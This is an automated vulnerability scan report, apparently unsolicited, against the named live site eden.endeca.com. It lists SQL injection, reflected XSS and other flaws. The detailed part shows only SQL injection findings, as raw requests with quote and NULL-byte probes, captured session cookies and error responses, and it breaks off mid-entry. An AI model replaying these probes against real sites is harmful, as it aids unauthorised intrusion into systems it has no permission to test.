XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, eden.endeca.com Comment: This is an Oracle acquisition target, thus the private report. Report generated by XSS.CX at Sat Oct 22 08:59:28 CDT 2011. Loading
1. SQL injection
1.1. http://eden.endeca.com/c/portal/render_portlet [GUEST_LANGUAGE_ID cookie]
1.2. http://eden.endeca.com/c/portal/render_portlet [User-Agent HTTP header]
1.3. http://eden.endeca.com/c/portal/render_portlet [User-Agent HTTP header]
1.4. http://eden.endeca.com/c/portal/render_portlet [_58_rememberMe parameter]
1.5. http://eden.endeca.com/c/portal/render_portlet [__ALC_CLIENT_ID cookie]
1.6. http://eden.endeca.com/c/portal/render_portlet [__ALC_START cookie]
1.7. http://eden.endeca.com/c/portal/render_portlet [__utma cookie]
1.8. http://eden.endeca.com/c/portal/render_portlet [__utma cookie]
1.9. http://eden.endeca.com/c/portal/render_portlet [__utmb cookie]
1.10. http://eden.endeca.com/c/portal/render_portlet [__utmb cookie]
1.11. http://eden.endeca.com/c/portal/render_portlet [__utmc cookie]
1.12. http://eden.endeca.com/c/portal/render_portlet [__utmv cookie]
1.13. http://eden.endeca.com/c/portal/render_portlet [__utmx cookie]
1.14. http://eden.endeca.com/c/portal/render_portlet [__utmxx cookie]
1.15. http://eden.endeca.com/c/portal/render_portlet [__utmz cookie]
1.16. http://eden.endeca.com/c/portal/render_portlet [__utmz cookie]
1.17. http://eden.endeca.com/c/portal/render_portlet [k_visit cookie]
1.18. http://eden.endeca.com/c/portal/render_portlet [name of an arbitrarily supplied request parameter]
1.19. http://eden.endeca.com/c/portal/render_portlet [name of an arbitrarily supplied request parameter]
1.20. http://eden.endeca.com/c/portal/render_portlet [p_l_id parameter]
2. Cross-site scripting (reflected)
2.1. http://eden.endeca.com/c/portal/render_portlet [_58_login parameter]
2.2. http://eden.endeca.com/dwr/interface/ECU.js [REST URL parameter 3]
2.3. http://eden.endeca.com/dwr/interface/EdenDWRUtils.js [REST URL parameter 3]
2.4. http://eden.endeca.com/web/guest/home [name of an arbitrarily supplied request parameter]
2.5. http://eden.endeca.com/web/guest/home [name of an arbitrarily supplied request parameter]
2.6. http://eden.endeca.com/web/guest/home [p_p_mode parameter]
2.7. http://eden.endeca.com/web/guest/home [p_p_mode parameter]
2.8. http://eden.endeca.com/web/guest/home [p_p_state parameter]
2.9. http://eden.endeca.com/web/guest/home [p_p_state parameter]
2.10. http://eden.endeca.com/ [JSESSIONID cookie]
2.11. http://eden.endeca.com/c/portal/login [JSESSIONID cookie]
2.12. http://eden.endeca.com/web/eden/home [JSESSIONID cookie]
2.13. http://eden.endeca.com/web/guest/home [JSESSIONID cookie]
3. Cleartext submission of password
3.1. http://eden.endeca.com/c/portal/login
3.2. http://eden.endeca.com/c/portal/render_portlet
4. Password field with autocomplete enabled
4.1. http://eden.endeca.com/c/portal/login
4.2. http://eden.endeca.com/c/portal/render_portlet
5. Source code disclosure
5.1. http://eden.endeca.com/c/portal/login
5.2. http://eden.endeca.com/c/portal/render_portlet
5.3. http://eden.endeca.com/html/themes/endeca_comp1/css/css_cleaned.css
5.4. http://eden.endeca.com/web/eden/home
5.5. http://eden.endeca.com/web/guest/home
6. Referer-dependent response
7. Email addresses disclosed
7.1. http://eden.endeca.com/c/portal/login
7.2. http://eden.endeca.com/html/js/calendar/calendar_stripped.js
7.3. http://eden.endeca.com/html/js/jquery/cookie.js
7.4. http://eden.endeca.com/html/js/jquery/dimensions.js
7.5. http://eden.endeca.com/html/js/jquery/hover_intent.js
7.6. http://eden.endeca.com/html/js/jquery/jeditable.js
7.7. http://eden.endeca.com/html/js/jquery/tabs.js
7.8. http://eden.endeca.com/web/eden/home
7.9. http://eden.endeca.com/web/guest/home
8. HTML does not specify charset
8.1. http://eden.endeca.com/
8.2. http://eden.endeca.com/web/guest/home
9. Content type incorrectly stated
9.1. http://eden.endeca.com/dwr/interface/ECU.js
9.2. http://eden.endeca.com/dwr/interface/EdenDWRUtils.js
9.3. http://eden.endeca.com/web/guest/home
10. Content type is not specified
1. SQL injection
next
There are 20 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed. Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://eden.endeca.com/c/portal/render_portlet [GUEST_LANGUAGE_ID cookie]
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The GUEST_LANGUAGE_ID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the GUEST_LANGUAGE_ID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the GUEST_LANGUAGE_ID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US%2527 ; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US%2527%2527 ; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.2. http://eden.endeca.com/c/portal/render_portlet [User-Agent HTTP header]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
POST /c/portal/render_portlet HTTP/1.1' -urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1'' -urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.3. http://eden.endeca.com/c/portal/render_portlet [User-Agent HTTP header]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
POST /c/portal/render_portlet HTTP/1.1%00' -urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1%00'' -urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.4. http://eden.endeca.com/c/portal/render_portlet [_58_rememberMe parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The _58_rememberMe parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _58_rememberMe parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnormal%26p_p_mode%3Dview%26p_p_col_id%3Dcolumn-2%26p_p_col_count%3D2%26_58_struts_action%3D%252Flogin%252Fview%26_58_cmd%3Dupdate&_58_cmd=update&_58_login=xss&_58_rememberMe=false%00' &_58_password=xs&_58_struts_action=%2Flogin%2Fview
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnormal%26p_p_mode%3Dview%26p_p_col_id%3Dcolumn-2%26p_p_col_count%3D2%26_58_struts_action%3D%252Flogin%252Fview%26_58_cmd%3Dupdate&_58_cmd=update&_58_login=xss&_58_rememberMe=false%00'' &_58_password=xs&_58_struts_action=%2Flogin%2Fview
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.5. http://eden.endeca.com/c/portal/render_portlet [__ALC_CLIENT_ID cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __ALC_CLIENT_ID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __ALC_CLIENT_ID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __ALC_CLIENT_ID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c%2527 ; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c%2527%2527 ; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.6. http://eden.endeca.com/c/portal/render_portlet [__ALC_START cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __ALC_START cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __ALC_START cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __ALC_START cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3%2527 ; __ALC_OREF=Direct; __ALC_CLIENT_ID=6443-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3%2527%2527 ; __ALC_OREF=Direct; __ALC_CLIENT_ID=6443-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 2
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]...
1.7. http://eden.endeca.com/c/portal/render_portlet [__utma cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1' ; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome%3Fp_p_id%3D58%26p_p_action%3D1%26p_p_state%3Dnorma...[SNIP]...
Response 1
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... error ">You have entered invalid data. Please try again.</span>...[SNIP]... >Authentication fail ed. Please try again.</span>...[SNIP]...
Request 2
